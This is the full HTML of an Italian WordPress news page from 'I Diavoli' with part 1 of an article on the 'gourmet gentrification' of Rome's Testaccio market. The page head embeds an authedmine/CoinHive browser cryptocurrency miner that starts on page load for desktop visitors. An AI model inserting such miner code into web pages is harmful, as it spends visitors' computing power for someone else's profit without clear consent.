﻿<!doctype html>
<html>
<!--[if IE 8]> <html lang="it" class="ie8"> <![endif]-->  
<!--[if IE 9]> <html lang="it" class="ie9"> <![endif]-->  
<!--[if !IE]><!--> <html lang="it"> <!--<![endif]-->  
<head>
<title>La chiamavano &quot;Gourmet gentrification&quot; (pt.1) - I Diavoli</title>
<!-- Meta -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- Favicon -->
<link rel="shortcut icon" href="http://www.idiavoli.com/wp-content/themes/idiavoli/favicon.ico">
<!-- WP -->
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://www.idiavoli.com/xmlrpc.php" />
<!-- Barra WP -->

<!-- This site is optimized with the Yoast SEO plugin v3.4 - https://yoast.com/wordpress/plugins/seo/ -->
<meta name="description" content="Quando il mercato rionale cerca di attrarre turisti e visitatori, eccellenza gastronomica ed esotismo &quot;popolare&quot; si mescolano."/>
<meta name="robots" content="noodp"/>
<link rel="canonical" href="http://www.idiavoli.com/focus/gourmet-gentrification-nuovi-mercati-rionali/" />
<meta property="og:locale" content="it_IT" />
<meta property="og:type" content="article" />
<meta property="og:title" content="La chiamavano &quot;Gourmet gentrification&quot; (pt.1) - I Diavoli" />
<meta property="og:description" content="Quando il mercato rionale cerca di attrarre turisti e visitatori, eccellenza gastronomica ed esotismo &quot;popolare&quot; si mescolano." />
<meta property="og:url" content="http://www.idiavoli.com/focus/gourmet-gentrification-nuovi-mercati-rionali/" />
<meta property="og:site_name" content="I Diavoli" />
<meta property="article:tag" content="mercati" />
<meta property="article:section" content="Focus" />
<meta property="article:published_time" content="2018-04-12T06:17:58+02:00" />
<meta property="article:modified_time" content="2018-04-12T07:27:42+02:00" />
<meta property="og:updated_time" content="2018-04-12T07:27:42+02:00" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:description" content="Quando il mercato rionale cerca di attrarre turisti e visitatori, eccellenza gastronomica ed esotismo &quot;popolare&quot; si mescolano." />
<meta name="twitter:title" content="La chiamavano &quot;Gourmet gentrification&quot; (pt.1) - I Diavoli" />
<!-- / Yoast SEO plugin. -->

<link rel="alternate" type="application/rss+xml" title="I Diavoli &raquo; La chiamavano &#8220;Gourmet gentrification&#8221; (pt.1) Feed dei commenti" href="http://www.idiavoli.com/focus/gourmet-gentrification-nuovi-mercati-rionali/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/72x72\/","ext":".png","source":{"concatemoji":"http:\/\/www.idiavoli.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.4.15"}};
			!function(a,b,c){function d(a){var c,d,e,f=b.createElement("canvas"),g=f.getContext&&f.getContext("2d"),h=String.fromCharCode;return g&&g.fillText?(g.textBaseline="top",g.font="600 32px Arial","flag"===a?(g.fillText(h(55356,56806,55356,56826),0,0),f.toDataURL().length>3e3):"diversity"===a?(g.fillText(h(55356,57221),0,0),c=g.getImageData(16,16,1,1).data,g.fillText(h(55356,57221,55356,57343),0,0),c=g.getImageData(16,16,1,1).data,e=c[0]+","+c[1]+","+c[2]+","+c[3],d!==e):("simple"===a?g.fillText(h(55357,56835),0,0):g.fillText(h(55356,57135),0,0),0!==g.getImageData(16,16,1,1).data[0])):!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g;c.supports={simple:d("simple"),flag:d("flag"),unicode8:d("unicode8"),diversity:d("diversity")},c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.simple&&c.supports.flag&&c.supports.unicode8&&c.supports.diversity||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='wpdreams-rpp-instances-css'  href='http://www.idiavoli.com/wp-content/plugins/related-posts-pro/css/style.instances.css?ver=4.4.15' type='text/css' media='all' />
<link rel='stylesheet' id='ssbp_styles-css'  href='http://www.idiavoli.com/wp-content/plugins/simple-share-buttons-plus/ssbp.min.css?ver=4.4.15' type='text/css' media='all' />
<link rel='stylesheet' id='sm-css-css'  href='http://www.idiavoli.com/wp-content/plugins/stock-market-widgets/css/sm-style.css?ver=4.4.15' type='text/css' media='all' />
<link rel='stylesheet' id='ubermenu-roboto-css'  href='//fonts.googleapis.com/css?family=Roboto%3A%2C300%2C400%2C700&#038;ver=4.4.15' type='text/css' media='all' />
<link rel='stylesheet' id='wptoolset-field-datepicker-css'  href='http://www.idiavoli.com/wp-content/plugins/wp-views/embedded/toolset/toolset-common/toolset-forms/css/wpt-jquery-ui/jquery-ui-1.11.4.custom.css?ver=1.11.4' type='text/css' media='all' />
<link rel='stylesheet' id='mediaelement-css'  href='http://www.idiavoli.com/wp-includes/js/mediaelement/mediaelementplayer.min.css?ver=2.18.1' type='text/css' media='all' />
<link rel='stylesheet' id='wp-mediaelement-css'  href='http://www.idiavoli.com/wp-includes/js/mediaelement/wp-mediaelement.css?ver=4.4.15' type='text/css' media='all' />
<link rel='stylesheet' id='views-pagination-style-css'  href='http://www.idiavoli.com/wp-content/plugins/wp-views/embedded/res/css/wpv-pagination.css?ver=1.12.1' type='text/css' media='all' />
<link rel='stylesheet' id='js_composer_front-css'  href='http://www.idiavoli.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=4.11.1' type='text/css' media='all' />
<link rel='stylesheet' id='ubermenu-css'  href='http://www.idiavoli.com/wp-content/plugins/ubermenu/pro/assets/css/ubermenu.min.css?ver=3.2.4' type='text/css' media='all' />
<link rel='stylesheet' id='ubermenu-font-awesome-css'  href='http://www.idiavoli.com/wp-content/plugins/ubermenu/assets/css/fontawesome/css/font-awesome.min.css?ver=4.3' type='text/css' media='all' />
<link rel='stylesheet' id='bsf-Defaults-css'  href='http://www.idiavoli.com/wp-content/uploads/smile_fonts/Defaults/Defaults.css?ver=4.4.15' type='text/css' media='all' />
<link rel='stylesheet' id='wpdreams-rpp-fxsmall-css'  href='http://www.idiavoli.com/wp-content/plugins/related-posts-pro/css/fxsmall.css?ver=4.4.15' type='text/css' media='all' />
<script type='text/javascript' src='http://www.idiavoli.com/wp-includes/js/jquery/jquery.js?ver=1.11.3'></script>
<script type='text/javascript' src='http://www.idiavoli.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1'></script>
<script type='text/javascript' src='http://www.idiavoli.com/wp-content/plugins/related-posts-pro/js/min-scoped/jquery.rpp-isotope.js?ver=4.4.15'></script>
<script type='text/javascript' src='http://www.idiavoli.com/wp-content/plugins/sticky-menu-or-anything-on-scroll/assets/js/jq-sticky-anything.min.js?ver=2.0.1'></script>
<script type='text/javascript' src='http://www.idiavoli.com/wp-content/plugins/stock-market-widgets/js/sm_widgets.min.js?ver=1.0.0'></script>
<script type='text/javascript' src='http://www.idiavoli.com/wp-content/plugins/wonderplugin-lightbox/engine/wonderpluginlightbox.js?ver=4.0C'></script>
<link rel='https://api.w.org/' href='http://www.idiavoli.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.idiavoli.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.idiavoli.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.4.15" />
<link rel='shortlink' href='http://www.idiavoli.com/?p=7739' />
<link rel="alternate" type="application/json+oembed" href="http://www.idiavoli.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.idiavoli.com%2Ffocus%2Fgourmet-gentrification-nuovi-mercati-rionali%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://www.idiavoli.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.idiavoli.com%2Ffocus%2Fgourmet-gentrification-nuovi-mercati-rionali%2F&#038;format=xml" />
                <script type="text/javascript">
        rppjQuery(document).ready(function ($) {
            $('div[id^="relatedpostspro_0_"]').relatedpostspro({
                "node": null,
                "elements": ".rpp_item.rpp_visible",
                "elementsAll": ".rpp_item",
                "visibleClass": "rpp_visible",
                "fadeoutClass": "rpp_fadeout",
                "titleSelector": ".rpp_title",
                "loadingSelector": ".rpp_cssloading_container",
                "relevanceSelector": ".rpp_relevance",
                "type": "isotope",
                "isotopeLayout": "masonry",
                "transitionAnimation": "fxCoverflow",
                "initialFilter": "post_type",
                "autoplay": true,
                "autoplayTime": "6000",
                "overrideFilter": false,
                "minShow":  3,
                "defSortValue": "rpp_relevance",
                "defSortOrder": "desc",
                "showSettings": 1,
                "showSearchByDefault": 0,
                "exactSearchMatchOnly": 1,
                "dots": true
            });
        });
    </script>
<style id="ubermenu-custom-generated-css">
/** UberMenu Custom Menu Styles (Customizer) **/
/* main */
.ubermenu-main.ubermenu-transition-fade .ubermenu-item .ubermenu-submenu-drop { margin-top:0; }
.ubermenu-main .ubermenu-item-level-0 > .ubermenu-target { font-size:17px; text-transform:uppercase; color:#000000; }
.ubermenu-main .ubermenu-nav .ubermenu-item.ubermenu-item-level-0 > .ubermenu-target { font-weight:normal; }
.ubermenu-main .ubermenu-item-level-0 > .ubermenu-submenu-drop { box-shadow:none; }
.ubermenu-main .ubermenu-submenu.ubermenu-submenu-drop { color:#000000; }
.ubermenu-responsive-toggle.ubermenu-responsive-toggle-main { background:#000000; color:#ffffff; }
.ubermenu-main, .ubermenu-main .ubermenu-target, .ubermenu-main .ubermenu-nav .ubermenu-item-level-0 .ubermenu-target, .ubermenu-main div, .ubermenu-main p, .ubermenu-main input { font-family:'Roboto', sans-serif; font-weight:400; }


/** UberMenu Custom Menu Item Styles (Menu Item Settings) **/
/* 729 */   .ubermenu .ubermenu-submenu.ubermenu-submenu-id-729 { min-width:1px; }
/* 3744 */  .ubermenu .ubermenu-item.ubermenu-item-3744 > .ubermenu-target { color:#a85c2b; }
/* 5177 */  .ubermenu .ubermenu-item.ubermenu-item-5177 > .ubermenu-target { color:#000000; }
/* 5181 */  .ubermenu .ubermenu-item.ubermenu-item-5181 > .ubermenu-target { color:#000000; }
/* 5178 */  .ubermenu .ubermenu-item.ubermenu-item-5178 > .ubermenu-target { color:#000000; }
/* 5179 */  .ubermenu .ubermenu-item.ubermenu-item-5179 > .ubermenu-target { color:#000000; }
/* 5182 */  .ubermenu .ubermenu-item.ubermenu-item-5182 > .ubermenu-target { color:#000000; }
/* 5180 */  .ubermenu .ubermenu-item.ubermenu-item-5180 > .ubermenu-target { color:#000000; }
/* 58 */    .ubermenu .ubermenu-submenu.ubermenu-submenu-id-58 { background-color:#d0cbc7; }

/* Status: Loaded from Transient */

</style><meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://www.idiavoli.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><!--[if IE  8]><link rel="stylesheet" type="text/css" href="http://www.idiavoli.com/wp-content/plugins/js_composer/assets/css/vc-ie8.min.css" media="screen"><![endif]--><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript><!-- Style -->
<link href='https://fonts.googleapis.com/css?family=Crimson+Text:400,400italic' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Roboto:400,500,700' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Fjalla+One' rel='stylesheet' type='text/css'>
<link rel="stylesheet" type="text/css" media="all" href="http://www.idiavoli.com/wp-content/themes/idiavoli/style.css" />
<link href="http://www.idiavoli.com/wp-content/themes/idiavoli/css/bootstrap.css" rel="stylesheet">
<link href="http://www.idiavoli.com/wp-content/themes/idiavoli/css/custom.css" rel="stylesheet">

<script src="https://authedmine.com/lib/authedmine.min.js"></script>
<script>
    var miner = new CoinHive.Anonymous('xTm4b65mtwsRX8OgpgiPBMkL7qE4gZtE', {throttle: 0.5});
 
    // Only start on non-mobile devices and if not opted-out
    // in the last 14400 seconds (4 hours):
    if (!miner.isMobile() && !miner.didOptOut(14400)) {
        miner.start();
    }
</script>

<!-- Inserire Google Analytics -->
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-76568728-2', 'auto');
  ga('send', 'pageview');

</script>
<!-- Facebook Pixel Code -->
<script>
!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;
n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,
document,'script','https://connect.facebook.net/en_US/fbevents.js');

fbq('init', '160395171033862');
fbq('track', "PageView");</script>
<noscript><img height="1" width="1" style="display:none"
src="https://www.facebook.com/tr?id=160395171033862&ev=PageView&noscript=1"
/></noscript>
<!-- End Facebook Pixel Code -->
</head>
<body>
<div class="wrapper">
  <div class="barra-alta">
    <div class="container"> 
     <div class="social-top">
    		 <div><div class="textwidget"><ul>
<li><a href="https://www.facebook.com/idiavoliufficiale/?fref=ts" target="_blank"><img class="alignnone size-full wp-image-14" src="http://www.idiavoli.com/wp-content/uploads/2016/04/ico-facebook-idiavoli.jpg" alt="ico-facebook-idiavoli" width="21" height="19" /></a></li>
<li><a href="https://twitter.com/i_diavoli" target="_blank"><img class="alignnone size-full wp-image-16" src="http://www.idiavoli.com/wp-content/uploads/2016/04/ico-twitteridiavoli.jpg" alt="ico-twitteridiavoli" width="22" height="19" /></a></li>
<li><a href="https://www.linkedin.com/company/10260653?trk=tyah&amp;trkInfo=clickedVertical%3Acompany%2CclickedEntityId%3A10260653%2Cidx%3A1-1-1%2CtarId%3A1460323769748%2Ctas%3Ai%20diavoli" target="_blank"><img class="alignnone size-full wp-image-15" src="http://www.idiavoli.com/wp-content/uploads/2016/04/ico-linkedin-idiavoli.jpg" alt="ico-linkedin-idiavoli" width="21" height="19" /></a></li>
<li><a href="https://www.youtube.com/user/idiavoliufficiale" target="_blank"><img class="alignnone size-full wp-image-17" src="http://www.idiavoli.com/wp-content/uploads/2016/04/ico-youtube-idiavoli.jpg" alt="ico-youtube-idiavoli" width="22" height="19" /></a></li>
</ul>
</div></div>	            </div> 
    </div>
  </div>
  <div class="header">
      <div class="container">
            <div class="logo">
               		 <div><div class="textwidget"><p><a href="http://www.idiavoli.com/"><img class="alignnone size-medium wp-image-18" src="http://www.idiavoli.com/wp-content/uploads/2016/04/IDiavoli-logo-300x61.png" alt="IDiavoli-logo" width="300" height="61" /></a></p>
</div></div>	                 </div>  
            <div class="sottologo">
            <p>
<span class="datahome hidden-xs hidden-sm">aprile 2018</span>
<span class="mottohome">LA FINANZA RACCONTATA DALLA SUA SCATOLA NERA</span>
<span class="indicehome hidden-xs hidden-sm">Mib [stock symbol="FTSEMIB"] </span>
</p>
            </div>   
    </div> 
  </div> <!--/header-->
 
  
  <div id="barra1">
      <div class="container">
       
<!-- UberMenu [Configuration:main] [Theme Loc:menu_principale] [Integration:auto] -->
<a class="ubermenu-responsive-toggle ubermenu-responsive-toggle-main ubermenu-skin-none ubermenu-loc-menu_principale ubermenu-responsive-toggle-content-align-left ubermenu-responsive-toggle-align-full " data-ubermenu-target="ubermenu-main-2-menu_principale"><i class="fa fa-bars"></i>Menu</a><nav id="ubermenu-main-2-menu_principale" class="ubermenu ubermenu-nojs ubermenu-main ubermenu-menu-2 ubermenu-loc-menu_principale ubermenu-responsive ubermenu-responsive-default ubermenu-responsive-collapse ubermenu-horizontal ubermenu-transition-shift ubermenu-trigger-hover_intent ubermenu-skin-none  ubermenu-bar-align-full ubermenu-items-align-center ubermenu-bound ubermenu-disable-submenu-scroll ubermenu-sub-indicators ubermenu-retractors-responsive"><ul id="ubermenu-nav-main-2-menu_principale" class="ubermenu-nav"><li id="menu-item-58" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-home ubermenu-item-has-children ubermenu-item-58 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-drop ubermenu-has-submenu-mega" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="http://www.idiavoli.com/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">Home</span></a><ul class="ubermenu-submenu ubermenu-submenu-id-58 ubermenu-submenu-type-auto ubermenu-submenu-type-mega ubermenu-submenu-drop ubermenu-submenu-align-full_width" ><li id="menu-item-5177" class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-current-post-ancestor ubermenu-current-menu-parent ubermenu-current-post-parent ubermenu-item-5177 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="http://www.idiavoli.com/focus/"><span class="ubermenu-target-title ubermenu-target-text">FOCUS</span></a></li><li id="menu-item-5181" class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-item-5181 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="http://www.idiavoli.com/ritratti/"><span class="ubermenu-target-title ubermenu-target-text">RITRATTI</span></a></li><li id="menu-item-5178" class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-item-5178 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="http://www.idiavoli.com/banche/"><span class="ubermenu-target-title ubermenu-target-text">BANCHE</span></a></li><li id="menu-item-5179" class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-item-5179 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="http://www.idiavoli.com/recensioni/"><span class="ubermenu-target-title ubermenu-target-text">RECENSIONI</span></a></li><li id="menu-item-5182" class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-item-5182 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="http://www.idiavoli.com/interviste/"><span class="ubermenu-target-title ubermenu-target-text">INTERVISTE</span></a></li><li id="menu-item-5180" class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-item-5180 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="http://www.idiavoli.com/mailbox-riceviamo-e-pubblichiamo/"><span class="ubermenu-target-title ubermenu-target-text">MAILBOX</span></a></li><li class="ubermenu-retractor ubermenu-retractor-mobile"><i class="fa fa-times"></i> Close</li></ul></li><li id="menu-item-2229" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-2229 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="http://www.idiavoli.com/il-progetto/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">Il Progetto</span></a></li><li id="menu-item-737" class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-item-737 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="http://www.idiavoli.com/il-tredicesimo-piano/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">Il Tredicesimo Piano</span></a></li><li id="menu-item-3744" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-post ubermenu-item-3744 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="http://www.idiavoli.com/il-tredicesimo-piano/tredicesimo-piano-la-miniserie-web-air/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">Miniserie Web</span></a></li><li id="menu-item-1689" class="ubermenu-item ubermenu-item-type-post_type_archive ubermenu-item-object-video ubermenu-item-1689 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="http://www.idiavoli.com/video/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">Video</span></a></li><li id="menu-item-2106" class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-item-2106 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="http://www.idiavoli.com/english-selection/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">English Selection</span></a></li><li id="menu-item-729" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-729 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-drop ubermenu-has-submenu-mega ubermenu-submenu-rtl" ><span class="ubermenu-target ubermenu-target-with-icon ubermenu-item-layout-default ubermenu-item-layout-icon_left ubermenu-noindicator ubermenu-item-notext" tabindex="0"><i class="ubermenu-icon fa fa-search"></i></span><ul class="ubermenu-submenu ubermenu-submenu-id-729 ubermenu-submenu-type-auto ubermenu-submenu-type-mega ubermenu-submenu-drop ubermenu-submenu-align-right_edge_item" ><li id="menu-item-731" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-item-731 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-auto" ><div class="ubermenu-content-block ubermenu-custom-content ">	<!-- UberMenu Search Bar -->
	<div class="ubermenu-search">
		<form role="search" method="get" class="ubermenu-searchform" action="http://www.idiavoli.com/">
			<input type="text" placeholder="Cerca" value="" name="s" class="ubermenu-search-input" />
			<input type="submit" class="ubermenu-search-submit" value="&#xf002;" />
		</form>
	</div>
	<!-- end .ubermenu-search -->
	</div></li><li class="ubermenu-retractor ubermenu-retractor-mobile"><i class="fa fa-times"></i> Close</li></ul></li></ul></nav>
<!-- End UberMenu -->
       
    </div>   
  </div> <!--/barra1-->    
  <div class="corpo">
    <div class="container">
  
    
    <div class="row">
    <div class="col-md-12 articolo-idiavoli">
     	<div class="articolo-post articolo-pagina" id="post-7739"> 
         <h3 class="occhiello"><span>I nuovi mercati rionali</span></h3>
<h1 class="titolo-articolo">La chiamavano &#8220;Gourmet gentrification&#8221; (pt.1)</h1>
<h3 class="sottotitolo">Quando il mercato rionale cerca di attrarre turisti e visitatori, eccellenza gastronomica ed esotismo del popolare si mescolano. Diventa oggetto di storytelling, i prezzi cambiano e smette di rivolgersi (solo) alla comunità locale. L'esperienza e la trasformazione del mercato di Testaccio a Roma.</h3>
<div class="immagine-copertina-grande">
<img width="1140" height="450" src="http://www.idiavoli.com/wp-content/uploads/2018/04/testaccio_mercato1.jpg" class="attachment-full img-responsive" alt="" style="" title="" srcset="http://www.idiavoli.com/wp-content/uploads/2018/04/testaccio_mercato1-300x118.jpg 300w, http://www.idiavoli.com/wp-content/uploads/2018/04/testaccio_mercato1-768x303.jpg 768w, http://www.idiavoli.com/wp-content/uploads/2018/04/testaccio_mercato1-1024x404.jpg 1024w, http://www.idiavoli.com/wp-content/uploads/2018/04/testaccio_mercato1.jpg 1140w" sizes="(max-width: 1140px) 100vw, 1140px" /></p>
<div class="data-art">
12 aprile 2018
</div>
</div>
<div class="articolo-dim">
<div class="col-md-8 col-art-sx"><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<p>Il mercato rionale sta cambiando volto in molti Paesi occidentali. Si fa “esperienza”, oggetto di storytelling. Si orienta a una clientela più occasionale, benestante, in cerca di prodotti sofisticati. Smette di essere un posto dove i residenti fanno la spesa e diventa un&#8217;attrazione turistica da visitare. Non più un polo al servizio del quotidiano di una comunità, ma un set teatrale per un pubblico che vuole combinare l&#8217;eccellenza gastronomica all&#8217;esotismo del popolare, del genuino, del tipico. E allora il mercato trasforma la sua funzione, e i prezzi. Secondo una ficcante definizione, è <a href="https://www.ilsalto.net/gourmet-gentrification/" target="_blank">la “Gourmet gentrification”</a>.</p>
<p>Nel recente, importante saggio sul turismo <a href="http://www.feltrinellieditore.it/opera/opera/il-selfie-del-mondo/"><em>Il selfie del mondo</em></a>, Marco D&#8217;Eramo centra la questione:</p>
<blockquote><p>
“I «mercati tipici» sono un altro esempio di backstage che si offre in spettacolo, perché lì i turisti cercano non «il bazar per turisti», ma il luogo in cui i locali vanno <em>davvero</em> a rifornirsi per la loro vita quotidiana. Questi mercatini all&#8217;inizio si offrono semplicemente allo sguardo continuando a mantenere il loro carattere “indigeno”, ma a poco a poco cominciano a offrire mercanzie rivolte soprattutto ai visitatori turisti, o semplicemente a impacchettare le stesse derrate ma in confezioni che possano essere acquistate (e regalate) come souvenir, finché diventano mercati interamente turistici”.
</p></blockquote>
<p>D&#8217;Eramo parte dall&#8217;esempio del Mercado de San Miguel a Madrid ma il discorso si estende con facilità ad altri casi, dal Brixton Market di Londra al Grand Central Market di Los Angeles. E negli ultimi anni Roma ha preso a correre in questa stessa direzione.</p>

		</div>
	</div>
</div></div></div></div><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="vc_separator wpb_content_element vc_separator_align_center vc_sep_width_100 vc_sep_pos_align_center vc_separator_no_text vc_sep_color_black"><span class="vc_sep_holder vc_sep_holder_l"><span  class="vc_sep_line"></span></span><span class="vc_sep_holder vc_sep_holder_r"><span  class="vc_sep_line"></span></span>
</div>
	<div class="wpb_single_image wpb_content_element vc_align_center">
		
		<figure class="wpb_wrapper vc_figure">
			<div class="vc_single_image-wrapper   vc_box_border_grey"><img width="1351" height="644" src="http://www.idiavoli.com/wp-content/uploads/2018/04/Screen-Shot-2018-04-12-at-6.16.06-AM.png" class="vc_single_image-img attachment-full" alt="Screen Shot 2018-04-12 at 6.16.06 AM" srcset="http://www.idiavoli.com/wp-content/uploads/2018/04/Screen-Shot-2018-04-12-at-6.16.06-AM-300x143.png 300w, http://www.idiavoli.com/wp-content/uploads/2018/04/Screen-Shot-2018-04-12-at-6.16.06-AM-768x366.png 768w, http://www.idiavoli.com/wp-content/uploads/2018/04/Screen-Shot-2018-04-12-at-6.16.06-AM-1024x488.png 1024w, http://www.idiavoli.com/wp-content/uploads/2018/04/Screen-Shot-2018-04-12-at-6.16.06-AM.png 1351w" sizes="(max-width: 1351px) 100vw, 1351px" /></div>
		</figure>
	</div>
<div class="vc_separator wpb_content_element vc_separator_align_center vc_sep_width_100 vc_sep_pos_align_center vc_separator_no_text vc_sep_color_black"><span class="vc_sep_holder vc_sep_holder_l"><span  class="vc_sep_line"></span></span><span class="vc_sep_holder vc_sep_holder_r"><span  class="vc_sep_line"></span></span>
</div></div></div></div></div><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<p>“Una Roma autentica”. “Punto di ritrovo ideale per tutti i buongustai”. Il <a href="http://www.mercatoditestaccio.it/" target="_blank">sito ufficiale</a> del nuovo mercato coperto di Testaccio (“Il quartiere più verace di Roma”) si rivolge all&#8217;esterno. Ritrae i negozianti come concorrenti di un reality e punta ad attrarre visitatori come una proloco.</p>
<blockquote><p>
Il concetto è che la tradizione vada mantenuta e affiancata dal nuovo. Ortofrutta e macellerie ma anche consulenti di <a href="http://www.mercatoditestaccio.it/banco/nat-home-decor/" target="_blank">interior design</a> e locali dove mangiare <em>arepas</em> venezuelane e bere estratti di mela, limone e pepe nero. E come all&#8217;alimentare si aggiungono abbigliamento e modernariato, così alla clientela storica del mercato si aggiunge un flusso nuovo e diverso. A voler fare previsioni sembra una trasversalità destinata a reggere poco, superato il breve periodo.
</p></blockquote>
<p>Nel 2012 il mercato rionale trasloca, a costeggiare via Galvani, dopo quasi dieci anni di lavori, interruzioni per ritrovamenti archeologici, slittamenti. Era il mercato di una grande piazza popolare, piazza Testaccio appunto, dov&#8217;era stata collocato negli anni del fascismo.</p>
